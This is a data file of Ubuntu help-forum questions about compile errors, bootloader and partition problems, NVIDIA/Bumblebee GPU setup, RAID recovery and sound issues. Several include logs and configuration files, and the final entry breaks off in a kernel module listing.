393684	error in vlc compilation with opencv support	i am trying to compile vlc 2.0 on ubuntu 13.10 with opencv support ( v. 2.4.6.1 ) . the compilation yields the following errors : compile : libopencv_example_plugin_la-opencv_example.lo opencv_example.c : in function 'filter ' : error : opencv_example.c:185 : 45 : too few arguments to function 'cvhaardetectobjects' cvsize ( 20 , 20 ) ) ; ^ in file included from /usr/local/include/opencv/cv.h:71:0 , from opencv_example.c:41 : /usr/local/include/opencv2/objdetect/objdetect.hpp:139:15 : note : declared here cvapi ( cvseq* ) cvhaardetectobjects ( const cvarr* image , ^ warning : opencv_example.c:210 : 57 : assignment discards 'const ' qualifier from pointer target type [ enabled by default ] p_sys- > event_info.p_region [ i ] .p_description = `` face detected '' ; ^ make : *** [ all ] error 2 has anyone encountered the same problem , or has an idea about how to solve it ? any help would be much appreciated . it seems that opencv support has been buggy in the past , but the problem seems to have been solved . and testing the opencv library with sample code yields satisfactory results , so i guess the problem comes from vlc ...
393685	problem with root with ubuntu 13.10	i am using windows 8.1 and i am trying to install ubuntu 13.10 with it . i try to install it on a partition that i made but an error message shows up saying that `` no root system is defined . '' when i booted up ubuntu from the cd a quick message also showed up that there is a problem with the root . i am very new with ubuntu so please try to make this easy for me .
393689	how do i set up my laptop for steam gaming	i have a dell laptop that 's a few years old , and am connected to a second monitor . i 'd like to be able to play various steam-linux games on that laptop , but for a lot of the games i try to start ( minecraft [ not on steam ] , rogue legacy , dwarfs ? ! , starbound , others i 'm sure i 'm forgetting ) it seems that when i start them , xorg kicks to 50 % of my top processes ( dual-core ) , the game jumps to something in the 30 % range , and everything jitters and slows . i have the feeling that if i could go full-screen-gaming i could avoid some of that overhead , but i do n't know how to do that . usually , when everything slows to a crawl , i ctrl-alt-f1 , top , and kill xorg or the game process , then jump back to my ctrl-alt-f7 desktop , and am functional again , but not gaming . when i start up steam it tells me it wants to update my nvidia drivers , but when i tried that i was unable to start games at all . what i 'm really interested in is best practices for how to go about running linux/steam powered games on a laptop . i 'm cool with using just one screen , and not alt-tab-ing anywhere ; i just want to play some games . in case it matters , no wine involved .
393691	basic multiboot usb guide	there are some question here on askubuntu about this . but they mostly use gui , and or cli . what am looking for is , a basic guide on how to install grub or other on my 16gb usb , and a simple guide on how to edit a bootmenu ? so that i can add my xp.iso , for know i only need it to boot from xp , latter on , other operating systems .
393692	installing ubuntu , help with partitions	how to install ubuntu on my vista based laptop ? the copy of vista has ceased to boot , but i would still like to install ubuntu without overwriting it if possible . /dev/sda3 windows vista loader ( screen shot missed it )
393694	black screen after boot with amd radeon graphic card enabled	i have a problem with booting kubuntu 13.10 on a lenovo g510 notebook with this specs : -cpu : intel core i5 4200m -graphic card : intel graphics hd 4600 + amd radeon hd 8570m -s.o . : windows 8.1/kubuntu 13.10 when i try to boot kubuntu with the radeon enabled , it results in a black screen , instead if i disable it from the bios and use only uma graphics it works perfectly . so the problem is the radeon , but i ca n't keep it turned off all the time , it 'd be a waste ! maybe it 's because i have n't installed the drivers for the radeon , but i ca n't install them while the radeon is disabled . how can i fix this ?
393695	black screen when trying to install ubuntu 13.10	i am in need of some help . it has been 2 weeks since i bought my first ever windows laptop with the aim of replacing windows but i have been unsuccessful . the hardware is as follows : asus 15 ' f550d with a8 amd processor and radeon hd 8670m graphics the laptops runs efi `` bios '' i managed to switch off fastboot and secure boot in efi so far i managed to to boot from usb which i mounted the ubuntu 13.10 on but i can not get pass the grub menu as no matter when i chose i end up facing a black screen with back light on and i can not get anywhere beyond that . i have tried the following with no success : alternative versions of ubuntu ( 13.04 , 12.10 and kubuntu 13.10 { all 64 bit } ) problem remains . editing the boot options in grub and using `` nomodeset '' what can i try next ? any other suggestions ? please help windows 8 is sucking life out of me ! ! ! in a perfect world i would be aiming to have a dual boot system but if it 's easier to lose the big virus living in my system , windows 8 , then i 'm more than happy to go with that . ...
393698	start/stop services in linux ubuntu 13.10	i just installed prtg network monitor on linux ubuntu 13.10 and i ca n't get it to start . how can i start/stop services in linux ? like how you do in windows ?
393703	nexus 4 shows less memory that installed in the device after removing ubuntu touch	i tried to install ubuntu touch in nexus 4 and later i installed back cyanogenmod 11 , but only 12 gb is showing as memory instead of 16 gb . i think i was not able to completely remove ubuntu files installed in it . what should i do so that i get back the 16 gb ?
393705	trouble with jhbuild installation	i am trying to learn gtk+3 as per this site : https : //python-gtk-3-tutorial.readthedocs.org/en/latest/install.html . from the page : 1.1 . dependencies gtk+3 python 2 ( 2.6 or later ) or python 3 ( 3.1 or later ) gobject-introspection the easiest way to install pygobject from source is using jhbuild . it is designed to easily build source packages and discover what dependencies need to be build and in what order . to setup jhbuild , please follow the jhbuild manual . i followed the manual as per that link and downloaded via git jhbuild ( as they say to do ) and built it with make/make install . that went fine . the next step is where the problem begins . i ran the next command i was supposed to as per the page : 2.3 . build prerequisites before any modules can be built , it is necessary to have certain build tools installed . common build tools include the gnu autotools ( autoconf , automake , libtool and gettext ) , the gnu toolchain ( binutils , gcc , g++ ) , make , pkg-config and python , depending on which modules will be built . jhbuild can check the tools are installed using the sanitycheck command : $ jhbuild sanitycheck when i first ran this i got this : nate @ excelion-satellite-a105 : ~ $ jhbuild sanitcheck jhbuild : install prefix ( /opt/gnome ) can not be created so i began looking around for help . i looked at this question : jhbuild sanitycheck not moving , but it just told the obvious . nonetheless , i ran the following commands and got the results below : nate @ excelion-satellite-a105 : ~ $ sudo chmod 777 /opt/gnome/ -r [ sudo ] password for nate : chmod : can not access ‘/opt/gnome/’ : no such file or directory nate @ excelion-satellite-a105 : ~ $ mkdir /opt/gnome mkdir : can not create directory ‘/opt/gnome’ : permission denied nate @ excelion-satellite-a105 : ~ $ sudo mkdir /opt/gnome nate @ excelion-satellite-a105 : ~ $ jhbuild sanitcheck jhbuild : working directory ( /opt/gnome/_jhbuild ) can not be created nate @ excelion-satellite-a105 : ~ $ jhbuild sanitycheck jhbuild : working directory ( /opt/gnome/_jhbuild ) can not be created nate @ excelion-satellite-a105 : ~ $ chmod 777 /opt/gnome/ -r chmod : changing permissions of ‘/opt/gnome/’ : operation not permitted nate @ excelion-satellite-a105 : ~ $ sudo chmod 777 /opt/gnome/ -r nate @ excelion-satellite-a105 : ~ $ jhbuild sanitycheck checkout root ( /home/nate/checkout/gnome ) is not writable could not find the perl module xml : :parser cvs not found svn not found flex not found bison not found this is really annoying as i want to learn how to make guis with python and this appears to be the best current option ( btw ... if anyone has any input on that feel fine to comment ) does anyone know what the problem is with the installation ? thanks !
393707	aircrack and wifi problem	i update to the latest aircrack-ng because i was getting error while getting interface flags no such device . yet still getting the same error when i run airmon-ng start wlan0 i have linux standard sta broadcom driver installed . could not install b43 on my laptop hp dv6500 reason i do n't know keep getting e unable to locate fcutter-firmware-b43 ... help please
393713	windows entry ( uefi ) deleted , after installing ubuntu in legacy mode	i have n't found similar posts anywhere so i would be grateful for any help . i 've seen a couple of machines run ubuntu using legacy mode and windows using uefi boot . this requires a switch of boot options in bios , which i 'm ok with . so the behavior that i 'm looking for is exactly this , in legacy mode , boot ubuntu , in uefi mode , boot windows provided i make the bios switch at startup . however , after a series of installations and running boot-repair , which i 've explained below , i can only boot ubuntu in the legacy mode and when i switch to uefi mode , i go to grub rescue because it says `` no file found '' . now i ca n't boot into windows in any mode ! this is the sequence that caused this . -windows 8 x64 preinstalled -tried installing ubuntu in uefi , ran boot repair and this seemed to delete everything . -reinstalled ubuntu in legacy mode , ran boot repair which does n't work in the legacy mode now only ubuntu in legacy mode works . there is no grub menu at all in the uefi mode . here is the link to my boot info http : //paste.ubuntu.com/6608333/ how can i add a boot menu in the uefi mode while still having my ubuntu running in legacy mode .
393714	how can i get communication with my arduino uno over the serial port to work ?	i just got an arduino starter kit and want to start learning more about working with electronics . but i have a problem , the arduino tools â serial port menu item is greyed out and i do not know how to get it to work . it may be important to note that the l on the board is blinking as though i uploaded the example blink script ( blinking corresponds to communicating with the arduino -- setting up in the project book ) . however , i did not upload the scriptâś
393717	mount raid1 drive via usb into a new pc/laptop	i have two old 1tb hard drives that were in a raid1 array ( mdadm ) . they were last known to be working fine and the issue with the old pc is the mother board blew out . i now have a laptop with ubuntu ( both old & new systems are 12.10 ) and want to recover data from one of the disks from the old raid1 array . i have installed the drive and both disk utility + gparted can see the drive ( sdd or sdd1 ) . i try to mount the drive w/ a mount and i get an unknown file system error . if i try and recreate the raid1 array i get the message 'no raid devices specified ' after running this command : mdadm -- create /dev/md0 /dev/sdd1 when i run the following command 'sudo mdadm -- assemble -- scan ' i recieve the following message : 'mdadm : no arrays found in config file or automatically' not sure what i 'm doing wrong here . is it possibly because the old raid disk is now in an external usb enclosure and usb is not compatible with mdadm ? -- -- -- -- -- update 1 -- -- -- -- blkid shows the following : /dev/sda1 : label= '' system reserved '' uuid= '' 70e4be27e4bdf008 '' type= '' ntfs '' /dev/sda2 : label= '' system '' uuid= '' ccd0d0add0d09ed0 '' type= '' ntfs '' /dev/sda5 : uuid= '' 84461969-7fd0-4116-87f7-82d9d779aa2c '' type= '' ext4 '' /dev/sdb1 : uuid= '' 2bac94f2-3b77-49ab-975a-452b0f13da0d '' type= '' swap '' /dev/sdc1 : label= '' system '' uuid= '' 3206a0ae06a0748f '' type= '' ntfs '' /dev/sdc2 : label= '' singularity '' uuid= '' ead8203bd8200881 '' type= '' ntfs '' /dev/sdc3 : label= '' samsung_rec '' uuid= '' d036647c36646586 '' type= '' ntfs '' /dev/sdd1 : label= '' singularity1 '' uuid= '' 8bbfb36f-734e-44e2-b0d7-da074447861e '' type= '' ext4 '' -- -- -- -- update 2 -- -- -- -- attempting to mount from the 'disks ' gui utility : error mounting /dev/sdd1 at /media/troy/singularity1 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdd1 '' `` /media/troy/singularity1 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdd1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ( udisks-error-quark , 0 )
393718	installing wow on live cd ( on hdd )	do anyone have experience installing a game ( world of warcraft with wine ) , 22gb on a 1000gb hard drive running with livecd image ? ( saying no disk space ) i know the thing about persistances , but-.- how come i can download a file on 1.8 gb on home , and not install world of warcraft inside of home folder ? im running on livecd on hdd without security , cus i dont want persistant hacks on my computer . thanks
393720	grub broken , boot repair cd getting the same `` grub rescue '' error	after trying to format my 1tb hdd for windows from my ssd with ubuntu , i got the `` no such device grub rescue '' error upon trying to start ubuntu . i booted from a live cd and used the terminal to reinstall grub with boot repair , but i was told that the standard was 32bit and i needed 64bit . i made a 64bit boot repair cd and when i tried to boot from that i got the same error as my ssd . i also tried the `` how to repair , restore , or reinstall grub 2 with a ubuntu live cd or usb '' guide which tells me to mount the partition linux is on . after trying sudo chroot /mnt i got the error `` chroot : failed to run command â/bin/bashâ : exec format error '' since this is a new build i 'm to the point where i 'm just going to erase and reinstall ubuntu .
393723	infinity plugin audacious	hey guys i 'm quite new to ubuntu so sorry for asking newbi questions but : i found this interessting visualization plug-in for audacious ( http : //sourceforge.net/projects/infinity-plugin/ ) but i have no idea how to compile it . the last two trys caused a systemcrash . can someone please tell me what dependacies are required for the programm to compile ... thanks in advance btw if it helps i get this error : configure : error : * pkg-config not found . see http : //www.freedesktop.org/software/pkgconfig/ hey guys i 'm quite new to ubuntu so sorry for asking newbi questions but : i found this interessting visualization plug-in for audacious ( http : //sourceforge.net/projects/infinity-plugin/ ) but i have no idea how to compile it . the last two trys caused a systemcrash . can someone please tell me what dependencies are required for the programm to compile ... thanks in advance btw if it helps i get this error : configure : error : * pkg-config not found . see http : //www.freedesktop.org/software/pkgconfig/ update : i found pkg-config . you can install it by using the synaptics package manager . but now it 's asking for glib-2.0 ... which is not listed there ... at least not under this exact name . i 've found this thread where someone installed libperl-dev & libgtk2.0-dev ( http : //ubuntuforums.org/showthread.php ? t=1607632 ) and it kinda worked for him . i 'm trying that now . i going to give feedback on how it worked for me . btw : thanks for all the replies ; - ) another update : so here i am again . btw libperl-dev & libgtk2.0-dev somehow managed to get the compiling process moving . but only a few lines further : - ( . now , and here is where i 've ruined my previous ubuntu installations , it says : checking for dbusglib1 ... no configure : error : package requirements ( dbus-glib-1 > = 0.92 ) were not met : no package 'dbus-glib-1 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . the first 3 lines kinda make sense . it was looking for a certain package , namely dbus-glib-1 , but could n't find it in my system . the weird thing here is : i ca n't find this one either . i 've look almost everywhere . a web search refers me to the package libdbus-glib-1-2 ( http : //packages.debian.org/wheezy/libdbus-glib-1-2 ) but that one is already installed . i 'm afraid i have to consider figuring out what the second part means . i have to be honest here : i have no idea what i could possibly mean . could anyone please give me some sort of hint where to start looking .
393725	bumblebee can not access secondary gpu - error : [ xorg ]	i try hard and search to solve my problem and read a lot of related problem but still can not run nvidia on my hp laptop ubuntu 12.04 lts kernel version 3.8.0-34-generic and nvida gt 740m this is my lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphicscontroller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.1 pci bridge : intel corporation lynx point-lp pci express root port 2 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 08:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 08:00.1 bluetooth : ralink corp. rt3290 bluetooth 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 08 ) 0a:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) installed nvidia driver is 331 dpkg -l | grep -i nvidia ii bbswitch-dkms 0.8-1~preciseppa1 interface for toggling the power on nvidia optimus video cards ii bumblebee 3.2.1-1~preciseppa6 nvidia optimus support ii bumblebee-nvidia 3.2.1-1~preciseppa6 nvidia optimus support using the proprietary nvidia driver ii nvidia-331 331.20-0ubuntu1~xedgers~precise1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-common 1:0.2.44.2 find obsolete nvidia drivers ii nvidia-persistenced 331.20-0ubuntu1~xedgers~precise1 load the nvidia kernel driver and create device files ii nvidia-settings-331 331.20-0ubuntu1~xedgers~precise1 tool for configuring the nvidia graphics driver ii primus 20131127-1~preciseppa2 client-side gpu offloading for nvidia optimus bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331 module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau and xorg.conf.nvidia is section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:0a:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection optirun command $ optirun -vv firefox [ 2089.493498 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 2089.494194 ] [ info ] configured driver : nvidia [ 2089.494456 ] [ debug ] optirun version 3.2.1 starting ... [ 2089.494481 ] [ debug ] active configuration : [ 2089.494490 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 2089.494499 ] [ debug ] x display : :8 [ 2089.494507 ] [ debug ] ld_library_path : /usr/lib/nvidia-331 : /usr/lib32/nvidia-331 [ 2089.494516 ] [ debug ] socket path : /var/run/bumblebee.socket [ 2089.494525 ] [ debug ] accel/display bridge : auto [ 2089.494534 ] [ debug ] vgl compression : proxy [ 2089.494542 ] [ debug ] vglrun extra options : [ 2089.494551 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 2089.494611 ] [ debug ] using auto-detected bridge virtualgl [ 2089.499308 ] [ info ] response : no - error : [ xorg ] ( ee ) [ 2089.499335 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) [ 2089.499350 ] [ debug ] socket closed . [ 2089.499388 ] [ error ] aborting because fallback start is disabled . [ 2089.499403 ] [ debug ] killing all remaining processes . i try to install different nvidia driver such as 319 , 319-update , current , 331-update but still same .
393726	where do i get the eclipse cdt	i have ubuntu 13.10 and eclipse 3.8 from the ubuntu software center . where do i get a compatible eclipse cdt ? i went to the eclipse web site , but it did not seem to provide a cdt for eclpise 3.8 . if the eclipse web site does provide a compatible cdt , i could not find it .
393728	i can not update my sytem	ubuntu is not getting updated when i try to update it shows : e : malformed line 43 in source list /etc/apt/sources.list ( dist parse ) my update manager is also not working when i try to open it from terminal it also show some errors similar to this
393729	bumblebee on 12.04.3 : can not access secondary gpu	\o title says it : trying to get bumblebee to work . system specs : msi ge70 w/ nvidia geforce 765m drivers installed : morphheus @ nyx : ~ $ dpkg -- get-selections | grep nvidia bumblebee-nvidia install nvidia-331 install nvidia-persistenced install nvidia-settings-331 install when i try to use optirun , i get this . morphheus @ nyx : ~ $ optirun -vv glxspheres [ 1146.020489 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1146.020756 ] [ info ] configured driver : nvidia [ 1146.020918 ] [ debug ] optirun version 3.2.1 starting ... [ 1146.020929 ] [ debug ] active configuration : [ 1146.020932 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1146.020935 ] [ debug ] x display : :8 [ 1146.020938 ] [ debug ] ld_library_path : /usr/lib/nvidia-331 : /usr/lib32/nvidia-331 [ 1146.020942 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1146.020945 ] [ debug ] accel/display bridge : auto [ 1146.020948 ] [ debug ] vgl compression : proxy [ 1146.020951 ] [ debug ] vglrun extra options : [ 1146.020954 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 1146.020981 ] [ debug ] using auto-detected bridge virtualgl [ 1146.041706 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 1146.041720 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 1146.041723 ] [ debug ] socket closed . [ 1146.041737 ] [ error ] aborting because fallback start is disabled . [ 1146.041740 ] [ debug ] killing all remaining processes . my bumblebee.conf file : morphheus @ nyx : ~ $ more /etc/bumblebee/bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331 pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau my xorg.conf.nvidia file : morphheus @ nyx : ~ $ more /etc/bumblebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . # busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection i 've been trying to get the damn thing working for a looong time now : p the integrated graphics work fine ( 60 fps on glxsphere [ i assume it 's capped at monitor refresh rate ] ) , but i 'd like to use the dedicated gpu . many thanks !
393731	running a graphical application through ssh and keeping it alive	i want to run a gui application from a remote client via ssh and keep it alive ( and eventually reconnect to it ) after the connection is closed . as an example : i want , from my home pc , to open a graphical backup tool on the server and get it running . then i disconnect from the server , shut down my pc , etc . later , i reconnect to the server and reopen the gui session to check on the backup progress . i tried screen and nohup , after starting a session with ssh -x , but the process is killed as soon as i disconnect from the ssh server . i also followed this , but the application did n't open . then i tried screen with xpra , following the steps here , but could n't get the gui application to show on my pc ( no errors , just nothing happens on the last step , xpra attach ) ... the process is running on the server , however ... i just ca n't see it . it might be important to note that it always outputs this when i open the program ( tried firefox and google-chrome ) : xlib : extension `` randr '' missing on display `` :7 '' . on a side note , i know i can use vnc or something like that . but i want to do it the hard way , because i like suffering with linux . edit : i just figured out that xpra seems to be working . i ran xpra attach :7 on the server side and it opened the application window . problem seems to be on the remote connection .
393734	battery indicator stuck at 98 % percentage	ubuntu 13.10 64-bit , used to work fine but lately battery applet with percentage says 98 % at boot but does n't drain ( though obviously battery is draining ) . how can i reboot the applet/make it work normally ? tried to end session , suspend , reboot ... did n't work . it , for some weeks , works fine , and for some others like this . i 'm upset ( being an average user without any special knowledge , just type in the console what others more capable say ) . i 'm on an acer aspire timeline u intel® core™ i3-2367m cpu @ 1.40ghz × 4 , intel® sandybridge mobile graphics . thanks for the help !
393737	sound driver is messed up , and mic does n't work correctly under ubuntu 12	quick ubuntu12 sound pops on boot and shutdown , and mic picks up non-existant static . edit : please note , audio out is fine . issue on shutdown and boot i often hear a loud blast from the speakers under 12.04 . i was able to get the mic to work by using the help from `` lenovo ideapad built-in mic not working in 12.04 '' , and running sudo gedit /etc/modprobe.d/alsa-base.conf and then adding alias snd-card-0 snd-hda-intel options snd-hda-intel model=auto , followed by rebooting . this made the microphone able to record , however , there is still a very loud background noise/fuzz/static that is recorded by the mic . this issue is confirmed to not be present under windows 8 on the same machine ( i 'm not sure about ubuntu13 ) these outputs may have been effected by the fact that i modified /etc/modprobe.d/alsa-base.conf , i do n't know . $ cat /proc/asound/cards 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xc2610000 irq 49 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xc2614000 irq 50 and $ lspci | grep -i audio 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) probably unrelated backround hardware driver info : i have a lenovo y410p laptop running ubuntu 12.04 lts . i have fixed most of the graphics issues ( i get graphical out finally ! but i still have to manually change the brightness every boot . ) , most of the bios/uefi issues , and it triple boots 13.10 and win8 . it is up-to-date , and runs the community supported version of bumblebee to deal with nvidia 's lack of direct support for nvidia optimus products ( a reason i might move from cuda to opencl ) . not related , but sometimes after the computer has gone to sleep/screen shuts off , and wakes up , the mouse will only move if the left mouse button is pressed -which is a pain ( because i ca n't properly click anything - to save what i 'm doing ) but fixes itself by logging out and logging back in ... edit : i figure i should put the kernel version and stuff too : $ uname -a linux mylenovolaptop 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ cat /proc/version linux version 3.8.0-34-generic ( buildd @ toyol ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 $ lsmod module size used by bbswitch 13611 0 dm_crypt 23051 1 pci_stub 12622 1 vboxpci 23236 0 vboxnetadp 13382 0 vboxnetflt 23478 0 vboxdrv 283008 4 vboxpci , vboxnetadp , vboxnetflt bnep 18258 2 rfcomm 47864 12 parport_pc 28284 0 ppdev 17113 0 binfmt_misc 17540 1 nls_iso8859_1 12713 1 arc4 12573 2 snd_hda_codec_realtek 79962 1 snd_hda_codec_hdmi 37463 1 iwldvm 249093 0 snd_hda_intel 44339 7 snd_hda_codec 141761 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel uvcvideo 82214 0 snd_hwdep 13668 1 snd_hda_codec coretemp 13596 0 videobuf2_core 40785 1 uvcvideo videodev 130053 2 uvcvideo , videobuf2_core snd_pcm 102477 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec mac80211 630977 1 iwldvm videobuf2_vmalloc 13056 1 uvcvideo joydev 17613 0 snd_seq_midi 13324 0 